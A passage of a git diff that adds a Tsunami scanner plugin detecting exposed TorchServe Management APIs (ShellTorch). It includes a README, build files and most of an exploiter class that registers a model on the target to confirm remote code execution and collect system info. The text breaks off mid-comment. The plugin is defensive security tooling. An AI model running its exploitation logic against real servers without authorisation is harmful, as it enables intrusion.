diff --git a/doyensec/detectors/rce/torchserve/README.md b/doyensec/detectors/rce/torchserve/README.md new file mode 100644 index 000000000..c048606f3 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/README.md @@ -0,0 +1,48 @@ +# TorchServe Management API Detection Plugin +## Overview +This plugin detects and assesses the security risks of TorchServe Management API instances. Inspired by the ShellTorch vulnerability chain (disclosed by [Oligo Security](https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654)), it addresses the critical risks associated with insecure configurations of TorchServe, a widely used open-source application for serving PyTorch models in production. + +## Background +TorchServe, before version 0.8.2, bound to `0.0.0.0` by default, potentially exposing its Management API to the internet. Since PyTorch models allow arbitrary code execution, unrestricted model addition poses significant risks including data leakage and user privacy breaches. + +The original ShellTorch attack exploited [CVE-2022-1471](https://nvd.nist.gov/vuln/detail/CVE-2022-1471), a vulnerability fixed in TorchServe 0.8.2. However, the risk of executing arbitrary code in models remains in the latest version (0.9.0). + +To mitigate these risks, TorchServe introduced the allow_urls feature, limiting model downloads to specified sources. However, a typical `allow_urls` configuration often includes entire services like GCP and AWS, which can be insecure. It's important to configure `allow_urls` carefully to avoid such vulnerabilities. + +## Plugin Description +This plugin detects exposed TorchServe Management API instances, assessing the remote code execution (RCE) risk. It supports multiple detection modes: + +### Static Mode +**Description:** Manually host a model file on a web server. Most reliable, particularly effective against lenient `allow_urls` configurations. +**Use case:** Ideal when `allow_urls` includes cloud services, posing a security risk. + +``` +--torchserve-management-api-mode=static --torchserve-management-api-model-static-url=https://s3.amazonaws.com/model.mar +``` + +### Local Mode +**Description:** Serve the model via an embedded web server. Quicker setup, but may fail against restrictive `allow_urls`. +**Use case:** Best for environments where `allow_urls` is not a limiting factor. + +``` +--torchserve-management-api-mode=local --torchserve-management-api-local-bind-host=tsunami --torchserve-management-api-local-bind-port=1234 --torchserve-management-api-local-accessible-url=http://mydomain.com/ +``` + +### SSRF Mode +**Description:** Uses Tsunami's callback server as the model source. Indirect verification of RCE risk. +**Use case:** Selected when direct model serving isn't feasible or as an additional verification layer. + +``` +--torchserve-management-api-mode=ssrf +``` + +### Basic Mode +**Description:** Default mode that relies solely on Management API fingerprinting. +**Use case:** Automatically selected when callback server isn't available, useful as a preliminary check. + +``` +--torchserve-management-api-mode=basic +``` + +## Testing +Utilize the following testbed for assessing plugin functionality: [TorchServe Security Testbed](https://github.com/google/security-testbeds/tree/main/torchserve). diff --git a/doyensec/detectors/rce/torchserve/build.gradle b/doyensec/detectors/rce/torchserve/build.gradle new file mode 100644 index 000000000..c9704ecf2 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/build.gradle @@ -0,0 +1,99 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami VulnDetector plugin for TorchServe CVE-2023-43654.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + javaxInjectVersion = '1' + jcommanderVersion = '1.48' + okhttpVersion = '3.12.0' + + + guavaVersion = '28.2-jre' + guiceVersion = '4.2.3' + tsunamiVersion = '0.0.14' + junitVersion = '4.13' + okhttpVersion = '3.12.0' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + implementation "javax.inject:javax.inject:${javaxInjectVersion}" + implementation "com.beust:jcommander:${jcommanderVersion}" + implementation "com.squareup.okhttp3:okhttp:${okhttpVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.guava:guava-testlib:${guavaVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} + +// Generate model.zip file and include it in the jar file. +task createModelsZip(type: Zip) { + from 'src/main/resources/model' + into '/' + destinationDirectory = file("$buildDir/resources/main") + archiveFileName = 'model.mar' +} + +processResources.dependsOn createModelsZip diff --git a/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..d64cd4917 Binary files /dev/null and b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar differ diff --git a/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..1af9e0930 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-8.5-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/doyensec/detectors/rce/torchserve/gradlew b/doyensec/detectors/rce/torchserve/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/doyensec/detectors/rce/torchserve/gradlew.bat b/doyensec/detectors/rce/torchserve/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/doyensec/detectors/rce/torchserve/settings.gradle b/doyensec/detectors/rce/torchserve/settings.gradle new file mode 100644 index 000000000..ef90a3ace --- /dev/null +++ b/doyensec/detectors/rce/torchserve/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'torchserve_management_api' diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java new file mode 100644 index 000000000..28ceb5af1 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java @@ -0,0 +1,900 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.base.Preconditions.checkNotNull; + +import com.google.common.flogger.GoogleLogger; +import com.google.gson.Gson; +import com.google.gson.GsonBuilder; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import com.google.gson.JsonParseException; +import com.google.gson.JsonParser; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpMethod; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import java.io.IOException; +import java.security.MessageDigest; +import java.time.Instant; +import java.util.ArrayList; +import java.util.List; +import javax.inject.Inject; +import okhttp3.HttpUrl; +import org.checkerframework.checker.nullness.qual.Nullable; + +public class TorchServeExploiter { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private final HttpClient httpClient; + public final Details details; + private final PayloadGenerator payloadGenerator; + private final TorchServeManagementAPIExploiterWebServer webServer; + private Payload payload; + public TorchServeRandomUtils randomUtils; + + enum ExploitationMode { + // Just detect the TorchServe Management API, do not attempt to exploit. + BASIC, + // Provide Tsunami callback server's URL as a model source, consider any callback as a + // confirmation. + SSRF, + // Provide a static URL as a model source, verify code execution directly. + STATIC, + // Serve a model locally, verify code execution directly. + LOCAL + } + + public class Details { + // Effective settings (merged from config file and cli args) + public ExploitationMode exploitationMode; + public String staticUrl; + public String localBindHost; + public int localBindPort; + public String localAccessibleUrl; + + // Data collected during the exploit + public List models; + public boolean hashVerification = false; + public boolean callbackVerification = false; + public String systemInfo; + public boolean cleanupFailed = false; + public String modelName; + public String targetUrl; + public String exploitUrl; + public String messageLogged; + + static final String LOG_MESSAGE = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: %s"; + + /** + * Constructor for Details class. Initializes the details with configuration and command line + * arguments. + * + * @param config Configuration object. + * @param args Command line arguments. + */ + public Details(TorchServeManagementApiConfig config, TorchServeManagementApiArgs args) { + initializeExploitationMode(args, config); + initializeUrls(args, config); + validateParameters(); + } + + private void initializeExploitationMode( + TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { + String mode = args.exploitationMode != null ? args.exploitationMode : config.exploitationMode; + if (mode.equals("auto")) { + this.exploitationMode = + payloadGenerator.isCallbackServerEnabled() + ? ExploitationMode.SSRF + : ExploitationMode.BASIC; + } else { + this.exploitationMode = ExploitationMode.valueOf(mode.toUpperCase()); + } + } + + private void initializeUrls( + TorchServeManagementApiArgs args, TorchServeManagementApiConfig config) { + this.staticUrl = args.staticUrl != null ? args.staticUrl : config.staticUrl; + this.localBindHost = args.localBindHost != null ? args.localBindHost : config.localBindHost; + this.localBindPort = args.localBindPort != 0 ? args.localBindPort : config.localBindPort; + this.localAccessibleUrl = + args.localAccessibleUrl != null ? args.localAccessibleUrl : config.localAccessibleUrl; + } + + private void validateParameters() { + if (this.exploitationMode == ExploitationMode.STATIC && this.staticUrl == null) { + throw new IllegalArgumentException( + "Static mode requires --torchserve-management-api-model-static-url"); + } + + if (this.exploitationMode == ExploitationMode.LOCAL) { + if (this.localBindHost == null + || this.localBindPort == 0 + || this.localAccessibleUrl == null) { + throw new IllegalArgumentException( + "Local mode requires --torchserve-management-api-local-bind-host," + + " --torchserve-management-api-local-bind-port and" + + " --torchserve-management-api-local-accessible-url"); + } + } + } + + public Severity getSeverity() { + return isVerified() ? Severity.CRITICAL : Severity.LOW; + } + + public boolean isVerified() { + return this.hashVerification || this.callbackVerification; + } + + public String generateDescription() { + StringBuilder description = + new StringBuilder("An exposed TorchServe management API was detected on the target. "); + description.append( + "TorchServe is a model server for PyTorch models. The management API allows adding new" + + " models to the server which by design can be used to execute arbitrary code on the" + + " target.\n"); + description.append( + "This exposure poses a significant security risk as it could allow unauthorized users to" + + " run arbitrary code on the server."); + + switch (this.exploitationMode) { + case SSRF: + description + .append( + "The exploit was confirmed by receiving a callback from the target while adding a" + + " new model with the following details: ") + .append(" - Name: ") + .append(this.modelName) + .append(" - URL: ") + .append(this.exploitUrl); + break; + case STATIC: + case LOCAL: + description + .append( + "The exploit was confirmed by adding a new model to the target with the following" + + " details: ") + .append(" - Name: ") + .append(this.modelName) + .append(" - URL: ") + .append(this.exploitUrl); + break; + default: + break; + } + + return description.toString(); + } + + public String generateAdditionalDetails() { + StringBuilder additionalDetails = new StringBuilder(); + + switch (this.exploitationMode) { + case BASIC: + additionalDetails.append( + "Callback verification is not enabled in Tsunami configuration, so the exploit" + + " could not be confirmed and only the Management API detection is reported." + + " It is recommended to enable callback verification for more conclusive" + + " vulnerability assessment."); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + case SSRF: + additionalDetails.append( + "A callback was received from the target while adding a new model, confirming the" + + " exploit. Code execution was not verified directly. For a more direct" + + " confirmation of remote code execution, consider using STATIC or LOCAL" + + " modes."); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + case STATIC: + case LOCAL: + additionalDetails + .append( + "Code execution was verified by adding a new model to the target and performing" + + " following actions:\n") + .append( + " - Calculating a hash of a random value and comparing it to the value returned" + + " by the target (" + + (this.hashVerification ? "Success" : "Failure") + + ")\n"); + + if (payloadGenerator.isCallbackServerEnabled()) { + additionalDetails.append( + " - Sending a callback to the target and confirming that the callback URL was" + + " received (" + + (this.callbackVerification ? "Success" : "Failure") + + ")\n"); + } + + additionalDetails + .append("System info collected from the target:\n") + .append(prettyPrintJson(this.systemInfo)) + .append("\n\n") + .append("The following log entry was generated on the target:\n\n") + .append(this.messageLogged); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\n\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + } + + return additionalDetails.toString(); + } + } + + @Inject + public TorchServeExploiter( + TorchServeManagementApiConfig config, + TorchServeManagementApiArgs args, + HttpClient httpClient, + PayloadGenerator payloadGenerator, + TorchServeManagementAPIExploiterWebServer webServer, + TorchServeRandomUtils randomUtils) { + this.httpClient = + checkNotNull(httpClient, "httpClient must not be null") + .modify() + .setFollowRedirects(false) + .build(); + this.payloadGenerator = checkNotNull(payloadGenerator, "payloadGenerator must not be null"); + this.details = + new Details( + checkNotNull(config, "config must not be null"), + checkNotNull(args, "args must not be null")); + this.webServer = checkNotNull(webServer, "webServer must not be null"); + this.randomUtils = checkNotNull(randomUtils, "randomUtils must not be null"); + } + + /** + * Verifies if the target service is vulnerable to TorchServe Management API RCE. + * + * @param service The network service to be checked. + * @return Details of the vulnerability if found, null otherwise. + */ + public @Nullable Details isServiceVulnerable(NetworkService service) { + HttpUrl targetUrl = buildTargetUrl(service); + + try { + return isServiceVulnerable(targetUrl); + } catch (IOException e) { + logger.atWarning().withCause(e).log( + "Failed to check if service is vulnerable due to network error"); + } catch (Exception e) { + logger.atSevere().withCause(e).log( + "Unexpected error occurred while checking service vulnerability"); + } finally { + cleanupExploit(); + } + return null; + } + + private @Nullable Details isServiceVulnerable(HttpUrl targetUrl) throws IOException { + if (!isTorchServe(targetUrl)) return null; + logger.atInfo().log("Target matches TorchServe Management API fingerprint"); + + // Scrape the list of models from the target + String modelName = getModelName(targetUrl); + + String url; + switch (this.details.exploitationMode) { + case BASIC: + logger.atFine().log("BASIC MODE"); + // It looks like TorchServe management API, but we can't exploit it as callback + // functionality has not been enabled + logger.atInfo().log("Callback verification is not enabled, skipping exploit"); + return this.details; + case SSRF: + logger.atFine().log("SSRF MODE"); + // Set the model URL to the Tsunami callback server, consider any callback as a confirmation + executeExploit(targetUrl, getTsunamiCallbackUrl(), modelName); + return checkTsunamiCallbackUrl() ? this.details : null; + case STATIC: + logger.atFine().log("STATIC MODE"); + // Use the provided URL as a model source, confirm code execution directly + url = this.details.staticUrl; + break; + case LOCAL: + logger.atFine().log("LOCAL MODE"); + // Serve the model locally, confirm code execution directly + url = serveExploitFile(modelName); + break; + default: + throw new IllegalArgumentException("Invalid mode: " + this.details.exploitationMode); + } + + // Common verification for STATIC and LOCAL + + executeExploit(targetUrl, url, modelName); + + // 1. Was the model added to the list of models? + // if (!getModelNames(targetUrl).contains(modelName)) return null; + if (!modelExists(targetUrl, modelName)) return null; + + // 2. Can we simulate code execution (hash + callback)? + if (!verifyExploit(targetUrl, modelName)) return null; + + // Report confirmed vulnerability + return this.details; + } + + /** Verifies that the model was added to the list of models on the target. */ + private boolean modelExists(HttpUrl targetUrl, String modelName) throws IOException { + HttpUrl url = targetUrl.newBuilder().addPathSegment("models").addPathSegment(modelName).build(); + JsonElement response = sendHttpRequestGetJson(HttpMethod.GET, url, null); + return response != null; + } + + /** + * Verifies if the exploit was successful on the target server. + * + *

This method simulates code execution through hash calculation and, if enabled, through + * Tsunami's callback server. It also logs and collects system info from the target. + * + * @param targetUrl The URL of the target server. + * @param modelName The name of the model used in the exploit. + * @return True if the exploit is verified successfully, false otherwise. + * @throws IOException If an I/O error occurs during the verification process. + */ + private boolean verifyExploit(HttpUrl targetUrl, String modelName) throws IOException { + boolean verified = false; + + // Simulate code execution through a hash calculation + String randomValue = randomUtils.getRandomValue(); + String hashReceived = interact(targetUrl, modelName, "tsunami-execute", randomValue); + this.details.hashVerification = randomUtils.validateHash(hashReceived, randomValue); + verified = this.details.hashVerification; + + // Simulate code execution through Tsunami's callback server + if (this.payloadGenerator.isCallbackServerEnabled()) { + String callbackUrl = getTsunamiCallbackUrl(); + interact(targetUrl, modelName, "tsunami-callback", callbackUrl); + verified |= checkTsunamiCallbackUrl(); + } + + // One of the verification methods must succeed for the exploit to be confirmed + if (!verified) return false; + + // generate the log file entry on the remote server and collect system info + // generate the log message by adding a timestamp to the template + this.details.messageLogged = String.format(Details.LOG_MESSAGE, Instant.now().toString()); + interact(targetUrl, modelName, "tsunami-log", this.details.messageLogged); + this.details.systemInfo = interact(targetUrl, modelName, "tsunami-info", "True"); + + return true; + } + + private boolean compareHash(String randomValue, String hash) { + try { + MessageDigest md = MessageDigest.getInstance("MD5"); + byte[] digest = md.digest(randomValue.getBytes()); + String expectedHash = String.format("%032x", new java.math.BigInteger(1, digest)); + return expectedHash.equals(hash); + } catch (java.security.NoSuchAlgorithmException e) { + return false; + } + } + + /** + * Sends an HTTP request to interact with a specific model on the TorchServe server. + * + *

This method communicates with the TorchServe model via the Management API, utilizing the + * 'customized=true' query parameter to bypass the need for locating the Inference API. It sends a + * request with custom headers and extracts the response from the 'customizedMetadata' field. + * + *

Note: This approach is used to directly interact with the model through Management API, + * avoiding issues with locating the Inference API which may be on a different port or not + * exposed. + * + * @param targetUrl The base URL of the TorchServe Management API. + * @param modelName The name of the model to interact with. + * @param headerName The name of the header to send in the request. + * @param headerValue The value of the header to send in the request. + * @return The response extracted from 'customizedMetadata' field, or null if an error occurs. + * @throws IOException If an I/O error occurs during the HTTP request. + */ + private @Nullable String interact( + HttpUrl targetUrl, String modelName, String headerName, String headerValue) + throws IOException { + // Generally in order to talk to a model we need to use an Inference API (default port: 8080) + // which is separate + // from the Management API (default port: 8081). However, there is a way to hit the model even + // through Management + // API by adding the "customized=true" query parameter to the request, as documented here: + // + // https://pytorch.org/serve/management_api.html#:~:text=customized=true + // + // We're using this trick to send a request to the model in order to avoid the need to locate + // the Inference API + // (which might be remapped to an arbitrary port or not exposed at all). + // With this approach, the actual payload is passed through `tsunami-*` headers and responses + // are placed to the + // "customizedMetadata" field of the response. + // + // Look at model.py for the supported headers and their meaning. + // + // $ curl http://torchserve-081:8081/models/somerandomname?customized=true \ + // -H 'tsunami-header: ' + // [ + // { + // "modelName": "somerandomname", + // "modelVersion": "1.0", + // "modelUrl": "https://s3.amazonaws.com/model.mar", + // "runtime": "python", + // 